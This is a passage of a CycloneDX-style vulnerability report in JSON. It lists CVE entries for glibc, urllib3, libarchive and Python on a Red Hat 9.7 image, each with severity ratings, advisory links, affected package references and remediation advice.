"urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4437", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4437" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4437" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4437" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34014" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4437" }, { "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2" } ], "published": "2026-03-20T20:16:49+00:00", "updated": "2026-04-07T18:41:36+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4438", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "critical" }, { "source": { "name": "redhat" }, "score": 4, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 20, 88 ], "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4438" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4438" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4438" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34015" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4438" }, { "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2" } ], "published": "2026-03-20T20:16:49+00:00", "updated": "2026-04-07T18:40:02+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-44431", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip" }, "ratings": [], "description": "### Impact\n\nWhen following cross-origin redirects for requests made using urllib3\u2019s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers \u2014 `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) \u2014 are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.", "recommendation": "Upgrade urllib3 to version 2.7.0", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-44431" }, { "url": "https://github.com/urllib3/urllib3" }, { "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc" } ], "affects": [ { "ref": "pkg:pypi/urllib3@2.6.3", "versions": [ { "version": "2.6.3", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:pypi/urllib3@2.6.3" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-44432", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip" }, "ratings": [], "description": "### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.7.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API since version 2.6.0, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, urllib3 before version 2.7.0 could still decompress the whole response instead of the requested portion in two cases:\n1. During the second `HTTPResponse.read(amt=N)` call when the response was decompressed using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. When `HTTPResponse.drain_conn()` was called after the response had been read and decompressed partially (compression algorithm did not matter here).\n\nThese issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected when streaming compressed responses from untrusted sources in either of these cases, unless decompression is explicitly disabled:\n\n1. A response encoded with `br` is read incrementally with at least two `HTTPResponse.read(amt=N)` or `HTTPResponse.stream(amt=N)` calls while using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. `HTTPResponse.drain_conn()` is called after response decompression has already started.\n\n\n### Remediation\n\nUpgrade to at least urllib3 version 2.7.0 in which the library:\n1. Is more efficient for reads with Brotli.\n2. Always skips decompression for `HTTPResponse.drain_conn()`.\n\nIf upgrading is not immediately possible, the following workarounds may reduce exposure in specific cases:\n1. For the Brotli-specific issue only, switch from [brotli](https://pypi.org/project/brotli/) to [brotlicffi](https://pypi.org/project/brotlicffi/) until you can upgrade urllib3; the official Brotli package is affected because of https://github.com/google/brotli/issues/1396.\n2. If your code explicitly calls `HTTPResponse.drain_conn()`, call `HTTPResponse.close()` instead when connection reuse is not important.\n\n\n### Credits\n\nThe Brotli-specific issue was reported by @kimkou2024.\n`HTTPResponse.drain_conn()` inefficiency was reported by @Cycloctane.", "recommendation": "Upgrade urllib3 to version 2.7.0", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-44432" }, { "url": "https://github.com/urllib3/urllib3" }, { "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j" } ], "affects": [ { "ref": "pkg:pypi/urllib3@2.6.3", "versions": [ { "version": "2.6.3", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:pypi/urllib3@2.6.3" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4786", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.1, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "source": { "name": "rocky" }, "severity": "high" } ], "cwes": [ 77 ], "description": "Mitgation of\u00a0CVE-2026-4519 was incomplete. If the URL contained \"%action\" the mitigation could be bypassed for certain browser types the \"webbrowser.open()\" API could have commands injected into the underlying shell. See\u00a0CVE-2026-4519 for details.", "recommendation": "Upgrade python-unversioned-command to version 3.9.25-3.el9_7.3; Upgrade python3 to version 3.9.25-3.el9_7.3; Upgrade python3-libs to version 3.9.25-3.el9_7.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4786" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10949" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4786" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-10949.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10949" }, { "url": "https://github.com/python/cpython/commit/28b4ad38067bbdad34edfcd03ad2de5f06387e53" }, { "url": "https://github.com/python/cpython/commit/c5767a72838a8dda9d6dc5d3558075b055c56bca" }, { "url": "https://github.com/python/cpython/commit/d22922c8a7958353689dc4763dd72da2dea03fff" }, { "url": "https://github.com/python/cpython/commit/d6d68494be70bdbda20f89f83801ba52ec37daa4" }, { "url": "https://github.com/python/cpython/commit/f4654824ae0850ac87227fb270f9057477946769" }, { "url": "https://github.com/python/cpython/issues/148169" }, { "url": "https://github.com/python/cpython/pull/148170" }, { "url": "https://linux.oracle.com/cve/CVE-2026-4786.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-11077.html" 